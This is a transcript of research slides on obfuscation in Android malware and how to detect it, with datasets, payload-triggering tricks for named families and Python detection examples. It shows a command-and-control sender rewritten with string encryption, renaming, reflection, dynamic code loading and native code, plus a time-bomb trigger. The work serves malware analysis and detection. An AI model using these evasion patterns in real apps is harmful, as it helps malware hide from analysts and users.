Obfuscated Android Application Development

Jean-François Lalande, Pierre Graux, Valérie Viet Triem Tong

CECC 2019, November 14th 2019

Slides: people.rennes.inria.fr/Jean-Francois.Lalande/talks/CECC19-lalande.pdf

Outline: Introduction, Malware examples, Malware analysis, Obfuscation, Results

Introduction

Android malware analysis

Static analysis: (byte)code parsing + CFG analysis
Dynamic analysis: execution (smartphone, Cuckoo sandbox)

Research goals:
malware detection, classification
flow recovering, data tainting
payload triggering, unpacking

[Image: Android robot, by Con-struct + replicant community, CC BY-SA 3.0]

Research papers

Research papers usually do:
1 Algorithm design, e.g. malware detection
2 Pick or build a dataset
3 Evaluation: pick a sample and run!

Building a dataset is difficult!
Where to find these samples? Are they representative? ...

Evaluating is difficult!
You may suffer crashes, operating system corruption...

What about "difficult" malware? Do we have them in the dataset? Triggering conditions? Obfuscated?

Malware examples

Example: Remote Admin Tools

Install malicious apps:

Badnews: obeys a remote server + delays the attack
Triggering: patch the bytecode + build a fake server

DroidKungFu1 (well known): delays the attack
Triggering: modify 'start' to 1 in sstimestamp.xml and reboot the device

Example: Blocker / Eraser

Wipes the SD card and blocks social apps:

WipeLocker: delayed attack
Triggering: launch the app and reboot the device

Example: Adware

Displays ads after some days:

MobiDash: delayed attack
Triggering: launch the application, reboot the device and modify com.cardgame.durak_preferences.xml

Example: Spyware

Steals contacts, SMS, IMEI, ...

SaveMe: verifies the Internet access
Triggering: enable Internet access and launch the app

Cajino: obeys a Baidu remote server
Triggering: simulate a server command with an Intent

Example: Ransomware

Encrypts the user's files and asks for payment:

SimpleLocker: waits for the device to reboot
Triggering: send a BOOT_COMPLETED intent

Malware analysis

Our analysis framework: GroddDroid (Abraham et al. 2015, Leslous et al. 2017)

[Figure: GroddDroid pipeline. The APK goes through a Static Analysis step that produces the CFG and a Payload Location (API usage, etc.). The Control Flow Tracer instruments the app into a New APK, which the GroddDroid Runner executes on a real smartphone as a Reference Execution; the Log Collector turns the logs into Code Coverage. Targeting One Payload, GroddDroid Forces Control Flow in another New APK, whose Execution with Branch Forcing yields the Malicious Code Triggering Coverage.]

GroddDroid output example: SimpleLocker

[Figure: GroddDroid output for the SimpleLocker sample]

Triggering conditions?

    long installed = getPackageManager()
            .getPackageInfo("jf.andro.malcon15demo2", 0)
            .firstInstallTime;
    SimpleDateFormat sdf = new SimpleDateFormat("yyyy");
    int yearInstalled = Integer.parseInt(sdf.format(installed));
    int currentYear = Integer.parseInt(sdf.format(new Date()));

    // We trigger the malicious code next year!
    if (currentYear > yearInstalled) {
        // payload
    }

Listing 1: Example of triggering condition (a time bomb: a sandbox that runs the sample on the day it is installed never reaches the payload)


So, all problems are solved?

Datasets: you don't really know what you have in datasets.

Dynamic analysis: you have to help malware execute itself.

Static analysis: obfuscation can prevent you from analyzing or building your dataset, and from driving your dynamic analysis.

⇒ we have the feeling that obfuscation use is increasing...

Obfuscation

Studying obfuscation

Objectives:
explain how to build obfuscated applications
propose detection algorithms
measure obfuscation usage in the wild

Contributions:
explain how to build obfuscated applications
detection algorithms are difficult to design
we can only measure the usage of programming techniques

Running example: connecting to a C&C server

    import java.io.IOException;
    import java.net.*;

    class CommandAndControl {
        public String url = "cc.url";
        public int port = 4242;
        public void sendCommand(byte[] buf, int length) throws IOException {
            DatagramPacket dp = new DatagramPacket(buf, length,
                    InetAddress.getByName(this.url), this.port);
            new DatagramSocket().send(dp);
        }
    }

Listing 2: Unobfuscated malicious code (the C&C address and port are plain constants, visible to any string search)

String encryption

    class AES256 {
        static public String aes256(String str) {
            String key = "<<key>>";
            ... // decrypt str with key
        }
    }
    class CommandAndControl {
        public String url = "<<ciphered url>>"; // "cc.url"
        public int port = 4242;
        public void sendCommand(byte[] buf, int length) throws IOException {
            // the clear-text URL only exists in memory, after decryption
            DatagramPacket dp = new DatagramPacket(buf, length,
                    InetAddress.getByName(AES256.aes256(this.url)), this.port);
            new DatagramSocket().send(dp);
        }
    }

Listing 3: String encrypted version

Running example: identifier renaming

    class ____ {
        public String ____ = "cc.url";
        public int ___ = 4242;
        public void ________(byte[] __, int _____) {
            DatagramPacket _______ = new DatagramPacket(__, _____,
                    InetAddress.getByName(this.____), this.___);
            new DatagramSocket().send(_______);
        }
    }

Listing 4: Identifier renaming version

Running example: reflection

    class CommandAndControl {
        public String url = "cc.url";
        public int port = 4242;
        public void sendCommand(byte[] buf, int length) throws Exception {
            // The target methods are resolved by name at runtime, so there is
            // no direct call to getByName or send in the bytecode.
            // Caveat: javac folds "get" + "ByName" into the single constant
            // "getByName"; to keep the pieces apart in the DEX, at least one
            // of them must not be a compile-time constant (a field, a call...).
            InetAddress addr = (InetAddress) InetAddress.class
                    .getDeclaredMethod("get" + "ByName", String.class)
                    .invoke(null, this.url);
            DatagramPacket dp = new DatagramPacket(buf, length, addr, this.port);
            DatagramSocket.class.getDeclaredMethod("s" + "end", DatagramPacket.class)
                    .invoke(new DatagramSocket(), dp);
        }
    }

Listing 5: Reflection version

Running example: dynamic code loading

    void invokeDynamically() throws Exception {
        /* Loads the implementation of C&C from a separate dex file */
        PathClassLoader pcl = new PathClassLoader(file.getPath(), null);
        Class<?> clazz = pcl.loadClass("CommandAndControl");
        Log.i("CL", "Loaded class from dex: " + clazz);
        Constructor<?> c = clazz.getConstructor();
        Object o = c.newInstance();
        Method m = clazz.getMethod("send", byte[].class, int.class);
        m.invoke(o, ...); // CommandAndControl.send(...)
    }

Listing 6: Dynamic code loading version (the C&C class is absent from the APK's own classes.dex)

Running example: native methods

    class CommandAndControl {
        public String url = "cc.url";
        public int port = 4242;
        public native void sendCommand(byte[] buf, int length);
    }

    #include <jni.h>

    extern "C" JNIEXPORT void JNICALL
    Java_CommandAndControl_sendCommand(JNIEnv* env, jobject thisPtr,
                                       jbyteArray buf, jint length) {
        jbyte* bufData = env->GetByteArrayElements(buf, NULL);
        jclass cls = env->GetObjectClass(thisPtr);
        jint port = env->GetIntField(thisPtr, env->GetFieldID(cls, "port", "I"));
        jstring url = (jstring) env->GetObjectField(thisPtr,
                env->GetFieldID(cls, "url", "Ljava/lang/String;"));
        /* Use libc functions (socket/sendto) to send the packet */
        env->ReleaseByteArrayElements(buf, bufData, JNI_ABORT);
    }

Listing 7: Native version (the sending logic leaves the DEX entirely; a bytecode-only analyzer sees just a native declaration)

Running example: packer

Unpacker:
unpack routine: unpack the bytecode of the application
load and run this new bytecode

Detecting obfuscation?

Is obfuscation used in the wild? Can we design a detection technique for obfuscated apps?

APK --obfuscation--> APK'

Goal:
classify APK as non obfuscated
classify APK' as obfuscated

Detection techniques

Can we detect the techniques used for obfuscation purposes?

Table: Overview of our analysis methods

Development technique    Analysis method    Detection
String encryption        usage ratio        yes (threshold)
Identifier renaming      usage ratio        yes (threshold)
Reflection               use                no
Dynamic code loading     use                no
Native method            use                no
Packer                   artifacts          yes

"use" is a binary flag: the app calls the API or it does not. Such a flag cannot separate obfuscation from the many legitimate uses of reflection, class loading and native code, hence "no" in the Detection column.

Strings encryption

APK --extract--> constant strings --compute--> entropy e
Count the strings such that e > T; the APK is flagged when at least n of them exceed the threshold.

Decision threshold: choose n = 1, 10, 100
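The entropy rule above, as an added example (not the authors' code): Shannon entropy per constant string, a count of strings above T, and the decision for the three values of n the slides compare. The string lists are constructed for the example; the three blob-like strings are made to look like base64 output and are not real ciphertext. The last "plain" string is deliberately a long English sentence, to show why the threshold alone is not enough.

```python
import math
from collections import Counter

# Constructed sample inputs (hypothetical, not pulled from any real APK):
# constant strings as they would be extracted from a DEX string table.
PLAIN_APP_STRINGS = [
    "OK",
    "Settings",
    "Welcome back",
    "user_preferences",
    "Could not connect to server",
    "https://example.com/api/v1",
    "The quick brown fox jumps over the lazy dog",  # long, many distinct chars
]
# The same app with three ciphertext-like blobs added (constructed to look
# like base64 output; they are not the encryption of anything).
ENCRYPTED_APP_STRINGS = PLAIN_APP_STRINGS + [
    "k9Qz2LxwVmPb7RtY3nGcHfUe1sJdAo4i",
    "Zx8vQ1mT6bN0cW3rLpK9yHsG2jFdE5a7",
    "p4Y7wR2qL9tZ0mC6xV3nB8kJ1hG5sD",
]


def shannon_entropy(s: str) -> float:
    """Shannon entropy of s in bits per character (0.0 for the empty string).
    It is bounded by log2(len(s)), so a 12-character string can never reach
    the 4.4 bits that a 32-character unique-character blob reaches easily."""
    if not s:
        return 0.0
    total = len(s)
    return -sum((c / total) * math.log2(c / total) for c in Counter(s).values())


def high_entropy_strings(strings, threshold):
    """The constant strings whose entropy e exceeds the threshold T."""
    return [s for s in strings if shannon_entropy(s) > threshold]


def is_string_encrypted(strings, threshold=4.4, n=1):
    """Decision rule of the slide: flag the APK when at least n constant
    strings have e > T. 4.4 and 4.6 are the two thresholds marked on the
    slides' entropy plot."""
    return len(high_entropy_strings(strings, threshold)) >= n


def detection_report(strings, threshold=4.4):
    """Evaluate, for one APK, the three values of n the slides compare."""
    count = len(high_entropy_strings(strings, threshold))
    return {n: count >= n for n in (1, 10, 100)}
```

At T = 4.4 and n = 1 the plain app is already flagged: the pangram alone scores about 4.43 bits, above the threshold. Raising T to 4.6 or requiring n = 10 removes that false positive while the three blobs (4.9 to 5.0 bits) still trip the rule, which is the trade-off the "n = 1, 10, 100" curves on the results slide visualize.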

Identifier renaming

APK --extract--> NB identifiers --size filtering--> matching against a word dictionary --> n matches
Ratio j = n / NB

Examples:

    private Integer my_variable; // Original
    private String zwf_fwz;      // Renamed
    private String u;            // Too short: cannot conclude
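The ratio j = n / NB as an added example (not the authors' implementation): identifiers shorter than a minimum length are dropped, the survivors are split on underscores and camelCase humps, and an identifier counts as a match when all its tokens are dictionary words. The dictionary, the minimum length of 3, the decision direction (flag when j is below the threshold) and the two identifier sets are assumptions made for this example.

```python
import re

# Constructed word list (hypothetical). A real run would load a full English
# dictionary, e.g. /usr/share/dict/words, instead of this handful of words.
DICTIONARY = {
    "my", "variable", "send", "command", "url", "port", "buffer", "length",
    "packet", "socket", "address", "get", "set", "user", "name", "count",
}

MIN_LENGTH = 3  # size filtering: "u" or "ab" cannot be judged either way


def split_words(identifier: str):
    """Split snake_case and camelCase identifiers into lowercase tokens:
    'bufferLength' -> ['buffer', 'length'], 'my_variable' -> ['my', 'variable'].
    An identifier made only of underscores yields no tokens."""
    spaced = identifier.replace("_", " ")
    spaced = re.sub(r"([a-z0-9])([A-Z])", r"\1 \2", spaced)
    return [tok.lower() for tok in spaced.split()]


def is_meaningful(identifier: str, dictionary=DICTIONARY) -> bool:
    """An identifier 'matches' when every token is a dictionary word."""
    tokens = split_words(identifier)
    return bool(tokens) and all(tok in dictionary for tok in tokens)


def renaming_ratio(identifiers, dictionary=DICTIONARY, min_length=MIN_LENGTH):
    """j = n / NB from the slide: NB identifiers survive size filtering,
    n of them match the dictionary. Returns (j, n, NB)."""
    kept = [ident for ident in identifiers if len(ident) >= min_length]
    n = sum(1 for ident in kept if is_meaningful(ident, dictionary))
    nb = len(kept)
    return (n / nb if nb else 0.0), n, nb


def is_renamed(identifiers, threshold=0.5, **kwargs) -> bool:
    """Flag the APK as identifier-renamed when j falls below the threshold
    (assumed direction: renamed code has few dictionary matches)."""
    j, _, _ = renaming_ratio(identifiers, **kwargs)
    return j < threshold


# Constructed identifier sets, as they would be collected from a DEX file.
ORIGINAL = ["my_variable", "sendCommand", "url", "port", "bufferLength",
            "userName", "getCount", "u"]
RENAMED = ["zwf_fwz", "a", "____", "qxk", "bXz", "u", "pq", "rtzq"]
```

Two things to keep in mind when reading j: the default name generators of ProGuard and R8 produce one- and two-letter names, so on such apps size filtering discards most identifiers and NB becomes small; and bundled third-party libraries contribute their own (usually meaningful, usually numerous) identifiers, which pushes j up even when the app's own code is fully renamed.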

Other techniques

Reflection: java.lang.reflect
Dynamic code loading: DexFile, PathClassLoader
Native methods: private native void f()
Packers: artifact detection with APKiD
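The three "use" checks of the table, as an added example that is not the authors' tooling: a scan of smali (disassembled DEX) for the java.lang.reflect / java.lang.Class entry points, the dalvik.system loader classes and native method declarations. The smali excerpt is written by hand to mirror the running example and is not disassembled from a real APK; the two DexClassLoader descriptors are added to the slide's DexFile and PathClassLoader because they serve the same purpose. The excerpt builds the reflected method name from "s" and "end" with String.concat, so the literal "send" never appears, which is the point the last function makes.

```python
import re

# Constructed smali excerpt (hypothetical, hand-written to mirror the running
# example): a native method, a class loaded through PathClassLoader, and a
# reflective call whose method name is assembled at runtime.
SMALI = """\
.class public Lcom/example/CommandAndControl;
.super Ljava/lang/Object;

.method public native sendCommand([BI)V
.end method

.method public invokeDynamically()V
    .locals 12
    new-instance v0, Ldalvik/system/PathClassLoader;
    invoke-direct {v0, v1, v2}, Ldalvik/system/PathClassLoader;-><init>(Ljava/lang/String;Ljava/lang/ClassLoader;)V
    const-string v3, "CommandAndControl"
    invoke-virtual {v0, v3}, Ljava/lang/ClassLoader;->loadClass(Ljava/lang/String;)Ljava/lang/Class;
    move-result-object v4
    const-string v5, "s"
    const-string v6, "end"
    invoke-virtual {v5, v6}, Ljava/lang/String;->concat(Ljava/lang/String;)Ljava/lang/String;
    move-result-object v7
    invoke-virtual {v4, v7, v8}, Ljava/lang/Class;->getMethod(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;
    move-result-object v9
    invoke-virtual {v9, v10, v11}, Ljava/lang/reflect/Method;->invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object;
    return-void
.end method
"""

# Class descriptors whose presence indicates dynamic code loading. The slide
# names DexFile and PathClassLoader; the DexClassLoader variants are added.
DCL_CLASSES = (
    "Ldalvik/system/DexFile;",
    "Ldalvik/system/PathClassLoader;",
    "Ldalvik/system/DexClassLoader;",
    "Ldalvik/system/InMemoryDexClassLoader;",
)
REFLECTION_RE = re.compile(
    r"Ljava/lang/reflect/"
    r"|Ljava/lang/Class;->(?:forName|getMethod|getDeclaredMethod|getField|getDeclaredField)\("
)
NATIVE_METHOD_RE = re.compile(r"^\.method\b.*\bnative\b")
CONST_STRING_RE = re.compile(r'const-string(?:/jumbo)?\s+v\d+,\s+"((?:[^"\\]|\\.)*)"')


def scan_smali(text: str):
    """Return, per technique, the (line number, line) pairs that use it."""
    hits = {"reflection": [], "dynamic_code_loading": [], "native": []}
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if NATIVE_METHOD_RE.match(line):
            hits["native"].append((lineno, line))
        if any(desc in line for desc in DCL_CLASSES):
            hits["dynamic_code_loading"].append((lineno, line))
        if REFLECTION_RE.search(line):
            hits["reflection"].append((lineno, line))
    return hits


def techniques_used(text: str):
    """The binary 'use' flags of the slide's table: present or not."""
    return {name: bool(lines) for name, lines in scan_smali(text).items()}


def const_strings(text: str):
    """Every const-string literal in the excerpt, i.e. all that a static,
    string-based signature gets to see. "send" is not among them."""
    return [m.group(1) for m in CONST_STRING_RE.finditer(text)]
```

The scan answers "is the technique used?" reliably, because the API descriptors themselves cannot be hidden from a DEX-level scan. What it cannot answer is "used for what?": the reflected target is only known once the concatenation has executed, and a banking app's dependency injection framework produces exactly the same hits. That is why the table reports "no" for detection on these three rows.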

Results

Datasets

AMD Dataset (Wei et al. [4]): 24,552 samples, 10-16
Drebin (Arp et al. [2]): 5,560 samples, 08-12
GoodMal19 (Viet Triem Tong et al. [3]): 10,000 samples, 15-18
Androzoo (Allix et al. [1]): 9,041 samples, 08-18

Obfuscation detection

Dataset      Total    Packer           Native           DCL               Reflection
GOOD [3]      4999       3 ( 0.06%)    1266 (25.58%)    4544 (91.82%)     4735 (95.68%)
MAL [3]       4991     542 (10.86%)    2378 (57.62%)    3730 (90.38%)     3893 (94.33%)
AMD [4]      24552      31 ( 0.13%)    5206 (21.52%)   15267 (63.12%)    19184 (79.31%)
Drebin [2]    5560       0 ( 0.00%)    1051 (19.07%)    1449 (26.29%)     3066 (55.62%)

Counts and percentages are those of the slide. Note that the Native, DCL and Reflection percentages are not computed over the Total column (e.g. 1266 / 4999 = 25.3%, not 25.58%); they use a slightly smaller denominator that the slide does not state.

Identifier renaming

[Figure: Detection rate (%) as a function of the ratio threshold (0.3 to 1.0), one curve per dataset: GOOD, MAL, AMD, Drebin]

Entropy for GOOD Dataset

[Figure: Detection ratio (%) as a function of the entropy threshold (0.0 to 5.0, with 4.4 and 4.6 marked), for n = 1, n = 10 and n = 100]

Conclusion and future works

Obfuscation:
usage increases
difficult to distinguish from legitimate use

Future works:
analysis of native applications
dataset building and use
PyMaO: an open source software for orchestrating experiments

[Image: © Inria / C. Morel]

Questions?

References

[1] Kevin Allix, Tegawendé F. Bissyandé, Jacques Klein, and Yves Le Traon. AndroZoo: Collecting millions of Android apps for the research community. In 13th International Conference on Mining Software Repositories (MSR '16), pages 468–471, New York, NY, USA, 2016. ACM.

[2] Daniel Arp, Michael Spreitzenbarth, Malte Hübner, Hugo Gascon, and Konrad Rieck. Drebin: Effective and explainable detection of Android malware in your pocket. In 21st Annual Network and Distributed System Security Symposium (NDSS), San Diego, CA, USA, 2014.

[3] V. Viet Triem Tong, C. Herzog, T. Concepción Miranda, P. Graux, J.-F. Lalande, and P. Wilke. Isolating malicious code in Android malware in the wild. In 14th International Conference on Malicious and Unwanted Software (MALWARE), Nantucket, MA, USA, 2019. IEEE Computer Society.

[4] Fengguo Wei, Yuping Li, Sankardas Roy, Xinming Ou, and Wu Zhou. Deep ground truth analysis of current Android malware. In International Conference on Detection of Intrusions and Malware, and Vulnerability Assessment (DIMVA), pages 252–276. Springer, 2017.